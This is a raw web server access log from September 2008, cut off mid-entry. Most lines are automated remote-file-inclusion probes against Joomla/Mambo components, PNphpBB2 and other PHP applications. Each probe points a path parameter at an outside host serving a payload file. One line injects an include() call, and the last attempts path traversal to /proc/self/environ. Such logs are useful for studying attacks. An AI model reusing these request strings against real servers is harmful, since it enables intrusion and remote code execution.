85.113.250.220 - - [22/Sep/2008:11:21:00 -0700] "GET //index.php?option=com_akogallery&func=detail&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95228 "-" "libwww-perl/5.805" "www.dmulk.com"
85.113.250.220 - - [22/Sep/2008:11:21:01 -0700] "GET /logs//index.php?option=com_akogallery&func=detail&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.238.98 - - [22/Sep/2008:11:21:02 -0700] "GET /logs/access_080407.log//index.php?option=com_mtree&task=listcats&cat_id=&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
12.192.82.221 - - [22/Sep/2008:11:21:03 -0700] "GET //index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95145 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.16.30 - - [22/Sep/2008:11:21:15 -0700] "GET //index.php?option=com_akolegal&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95143 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.87.84 - - [22/Sep/2008:11:21:43 -0700] "GET //index.php?option=com_performs&formid=&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95178 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.159.85 - - [22/Sep/2008:11:21:47 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://oursoultvxq.com/bbs/data/bbs/ideex.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.813" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:11:21:58 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:11:21:58 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:11:21:58 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:11:21:58 -0700] "GET /logs/access_080527.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.91.127.43 - - [22/Sep/2008:11:22:30 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.91.127.43 - - [22/Sep/2008:11:22:31 -0700] "GET //include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.91.127.43 - - [22/Sep/2008:11:22:31 -0700] "GET /logs//include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:11:22:38 -0700] "GET /logs/access.log//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:11:22:38 -0700] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:11:22:38 -0700] "GET //src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:11:22:44 -0700] "GET /logs/access_080911.log//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:11:22:54 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95133 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.27.201 - - [22/Sep/2008:11:22:55 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://ultima-web.info/ecrire/win_width.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.85.93.146 - - [22/Sep/2008:11:22:58 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.85.93.146 - - [22/Sep/2008:11:22:58 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.113.250.220 - - [22/Sep/2008:11:23:10 -0700] "GET /logs/access_080911.log//index.php?option=com_akogallery&func=detail&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:11:23:38 -0700] "GET //index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95149 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.159.85 - - [22/Sep/2008:11:24:00 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://oursoultvxq.com/bbs/data/bbs/ideex.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.15.159.85 - - [22/Sep/2008:11:24:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://oursoultvxq.com/bbs/data/bbs/ideex.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.15.159.85 - - [22/Sep/2008:11:24:01 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://oursoultvxq.com/bbs/data/bbs/ideex.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
212.122.161.247 - - [22/Sep/2008:11:24:03 -0700] "GET /logs/access_080714.log//poll.php/booth.php?include_path=http://www.asa-auto.ba/mambo/cache/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.122.161.247 - - [22/Sep/2008:11:24:04 -0700] "GET //poll.php/booth.php?include_path=http://www.asa-auto.ba/mambo/cache/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.122.161.247 - - [22/Sep/2008:11:24:04 -0700] "GET /logs//poll.php/booth.php?include_path=http://www.asa-auto.ba/mambo/cache/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:24:39 -0700] "GET /bikes/dteel/2008_09_21/?S=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.15.159.85 - - [22/Sep/2008:11:24:45 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://oursoultvxq.com/bbs/data/bbs/ideex.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.15.159.85 - - [22/Sep/2008:11:24:46 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://oursoultvxq.com/bbs/data/bbs/ideex.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.15.159.85 - - [22/Sep/2008:11:24:46 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://oursoultvxq.com/bbs/data/bbs/ideex.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.22.89.194 - - [22/Sep/2008:11:25:15 -0700] "GET /logs/access_071214.log//?_zb_path=http://www.clanramsey.net/genealogy/gendex/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.22.89.194 - - [22/Sep/2008:11:25:15 -0700] "GET /logs//?_zb_path=http://www.clanramsey.net/genealogy/gendex/idr.txt?? HTTP/1.1" 200 66162 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.22.89.194 - - [22/Sep/2008:11:25:16 -0700] "GET //?_zb_path=http://www.clanramsey.net/genealogy/gendex/idr.txt?? HTTP/1.1" 200 94792 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.50.100.82 - - [22/Sep/2008:11:25:16 -0700] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.186.117.208 - - [22/Sep/2008:11:25:19 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.bgfc.org/ktmlpro/includes/ktedit/popups/pop??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
203.142.24.104 - - [22/Sep/2008:11:25:45 -0700] "GET /logs/access_080401.log//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.142.24.104 - - [22/Sep/2008:11:25:47 -0700] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95253 "-" "libwww-perl/5.79" "www.dmulk.com"
203.142.24.104 - - [22/Sep/2008:11:25:48 -0700] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:25:49 -0700] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:11:25:53 -0700] "GET /logs/access_080826.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:25:59 -0700] "GET /logs/access_080903.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.200.169.108 - - [22/Sep/2008:11:26:20 -0700] "GET /logs/principal.php?conteudo=http://www.haridarshan.net/enrol/.sys/i??? HTTP/1.1" 404 275 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.200.169.108 - - [22/Sep/2008:11:26:20 -0700] "GET /logs/errors.php?error=http://www.haridarshan.net/enrol/.sys/i??? HTTP/1.1" 404 275 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.200.169.108 - - [22/Sep/2008:11:26:21 -0700] "GET /logs/principal.php?conteudo=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "